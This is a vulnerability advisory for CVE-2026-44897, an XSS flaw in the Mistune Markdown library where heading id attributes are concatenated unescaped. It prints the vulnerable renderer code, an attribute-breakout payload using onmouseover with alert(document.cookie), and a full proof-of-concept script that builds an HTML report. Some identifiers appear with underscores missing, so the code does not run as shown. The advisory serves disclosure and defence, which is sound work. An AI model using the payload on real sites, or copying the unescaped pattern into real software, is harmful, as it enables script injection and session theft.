PT-2026-39330 · Pypi · Mistune

Published

2026-05-09

·

Updated

2026-05-09

·

CVE-2026-44897

CVSS v3.1

6.1

Medium

VectorAV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Summary

HTMLRenderer.heading() builds the opening <hN> tag by string-concatenating the id attribute value directly into the HTML — with no call to escape(), safe entity(), or any other sanitisation function. A double-quote character " in the id value terminates the attribute, allowing an attacker to inject arbitrary additional attributes (event handlers, src=, href=, etc.) into the heading element.
The default TOC hook assigns safe auto-incremented IDs (toc 1, toc 2, …) that never contain user text. However, the add toc hook() API accepts a caller-supplied heading id callback. Deriving heading IDs from the heading text itself — to produce human-readable slug anchors like #installation or #getting-started — is by far the most common real-world usage of this callback (every major documentation generator does this). When the callback returns raw heading text, an attacker who controls heading content can break out of the id= attribute.

Details

File: src/mistune/renderers/html.py
def heading(self, text: str, level: int, **attrs: Any) -> str:
  tag = "h" + str(level)
  html = "<" + tag
   id = attrs.get("id")
  if id:
    html += ' id="' + id + '"'  # ← id is never escaped
  return html + ">" + text + "</" + tag + ">
"
The text body (line content) is escaped upstream by the inline token renderer, which is why text arrives as &quot; etc. But id arrives as a raw string directly from whatever the heading id callback returned — no escaping occurs at any point in the pipeline.

PoC

Step 1 — Establish the baseline (safe default IDs)
The script creates a parser with escape=True and the default add toc hook() (no custom heading id callback). The default hook generates sequential numeric IDs:
md safe = create markdown(escape=True)
add toc hook(md safe)     # default: heading id produces toc 1, toc 2, …

bl src = "## Introduction
"
bl out,  = md safe.parse(bl src)
Output — ID is auto-generated, no user text appears in it:
<h2 id="toc 1">Introduction</h2>
Step 2 — Add the realistic trigger: a text-based heading id callback
Deriving an anchor ID from the heading text is the standard real-world pattern (slugifiers, mkdocs, sphinx, jekyll all do this). The PoC uses the simplest possible version — return the raw heading text unchanged — to show the vulnerability without any extra transformation:
def raw id(token, index):
  return token.get("text", "")  # returns raw heading text as the ID

md vuln = create markdown(escape=True)
add toc hook(md vuln, heading id=raw id)
Step 3 — Craft the exploit payload
Construct a heading whose text contains a double-quote followed by an injected attribute:
## foo" onmouseover="alert(document.cookie)" x="
When raw id is called, token["text"] is foo" onmouseover="alert(document.cookie)" x=". This is passed verbatim to heading() as the id attribute value.
Step 4 — Observe attribute breakout in the output
ex src = '## foo" onmouseover="alert(document.cookie)" x="
'
ex out,  = md vuln.parse(ex src)
Actual output:
<h2 id="foo" onmouseover="alert(document.cookie)" x="">foo&quot; onmouseover=&quot;alert(document.cookie)&quot; x=&quot;</h2>
Note: the heading body text is correctly escaped (&quot;), but the id= attribute is not. A user who moves their mouse over the heading triggers alert(document.cookie). Any JavaScript payload can be substituted.

Script

A verification script was created to verify this issue. It creates a HTML page showing the bypass rendering in the browser.
#!/usr/bin/env python3
"""H2: HTMLRenderer.heading() inserts the id= value verbatim — no escaping."""
import os, html as h
from mistune import create markdown
from mistune.toc import add toc hook

def raw id(token, index):
  return token.get("text", "")

# --- baseline ---
md safe = create markdown(escape=True)
add toc hook(md safe)

bl file = "baseline h2.md"
bl src = "## Introduction
"
with open(os.path.join(os.getcwd(), bl file), "w") as f:
  f.write(bl src)
bl out,  = md safe.parse(bl src)

print(f"[{bl file}]
{bl src}")
print("[output — id=toc 1, no user content, safe]")
print(bl out)

# --- exploit ---
md vuln = create markdown(escape=True)
add toc hook(md vuln, heading id=raw id)

ex file = "exploit h2.md"
ex src = '## foo" onmouseover="alert(document.cookie)" x="
'
with open(os.path.join(os.getcwd(), ex file), "w") as f:
  f.write(ex src)
ex out,  = md vuln.parse(ex src)

print(f"[{ex file}]
{ex src}")
print("[output — heading id returns raw text, id= not escaped]")
print(ex out)

# --- HTML report ---
CSS = """
body{font-family:-apple-system,sans-serif;max-width:1200px;margin:40px auto;background:#f0f0f0;color:#111;padding:0 24px}
h1{font-size:1.3em;border-bottom:3px solid #333;padding-bottom:8px;margin-bottom:4px}
p.desc{color:#555;font-size:.9em;margin-top:6px}
.case{margin:24px 0;border-radius:8px;overflow:hidden;border:1px solid #ccc;box-shadow:0 1px 4px rgba(0,0,0,.1)}
.case-header{padding:10px 16px;font-weight:bold;font-family:monospace;font-size:.85em}
.baseline .case-header{background:#d1fae5;color:#065f46}
.exploit .case-header{background:#fee2e2;color:#7f1d1d}
.panels{display:grid;grid-template-columns:1fr 1fr;background:#fff}
.panel{padding:16px}
.panel+.panel{border-left:1px solid #eee}
.panel h3{margin:0 0 8px;font-size:.68em;color:#888;text-transform:uppercase;letter-spacing:.07em}
pre{margin:0;padding:10px;background:#f6f6f6;border:1px solid #e0e0e0;border-radius:4px;font-size:.78em;white-space:pre-wrap;word-break:break-all}
.rlabel{font-size:.68em;color:#aaa;margin:10px 0 4px;font-family:monospace}
.rendered{padding:12px;border:1px dashed #ccc;border-radius:4px;min-height:20px;background:#fff;font-size:.9em}
"""

def case(kind, label, filename, src, out):
  return f"""
<div class="case {kind}">
 <div class="case-header">{'BASELINE' if kind=='baseline' else 'EXPLOIT'} — {h.escape(label)}</div>
 <div class="panels">
  <div class="panel">
   <h3>Input — {h.escape(filename)}</h3>
   <pre>{h.escape(src)}</pre>
  </div>
  <div class="panel">
   <h3>Output — HTML source</h3>
   <pre>{h.escape(out)}</pre>
   <div class="rlabel">↓ rendered in browser (hover the heading to trigger onmouseover)</div>
   <div class="rendered">{out}</div>
  </div>
 </div>
</div>"""

page = f"""<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8">
<title>H2 — Heading ID XSS</title><style>{CSS}</style></head><body>
<h1>H2 — Heading ID XSS (unescaped id= attribute)</h1>
<p class="desc">HTMLRenderer.heading() in renderers/html.py does html += ' id="' + id + '"' with no escaping.
Triggered when heading id callback returns raw heading text — the most common doc-generator pattern.</p>
{case("baseline", "Clean heading → sequential id=toc 1, safe", bl file, bl src, bl out)}
{case("exploit", "Malicious heading → quotes break out of id=, onmouseover injected", ex file, ex src, ex out)}
</body></html>"""

out path = os.path.join(os.getcwd(), "report h2.html")
with open(out path, "w") as f:
  f.write(page)
print(f"
[report] {out path}")
Example Usage:
python poc.py
Once the script is run, open report h2.html in the browser and observe the behaviour.

Impact

DimensionAssessment
ConfidentialitySession cookie / auth token theft via JavaScript execution triggered on mouse interaction
IntegrityDOM manipulation, phishing content injection, forced navigation
AvailabilityPage freeze or crash available to attacker
Risk context: This vulnerability targets the most common customisation point for heading IDs. Any documentation site, wiki, or blog engine that generates slug-style anchors from heading text is vulnerable if it uses mistune's heading id callback without independently sanitising the returned value.

Fix

XSS

Weakness Enumeration

Related Identifiers

CVE-2026-44897
GHSA-V87V-83H2-53W7

Affected Products

Mistune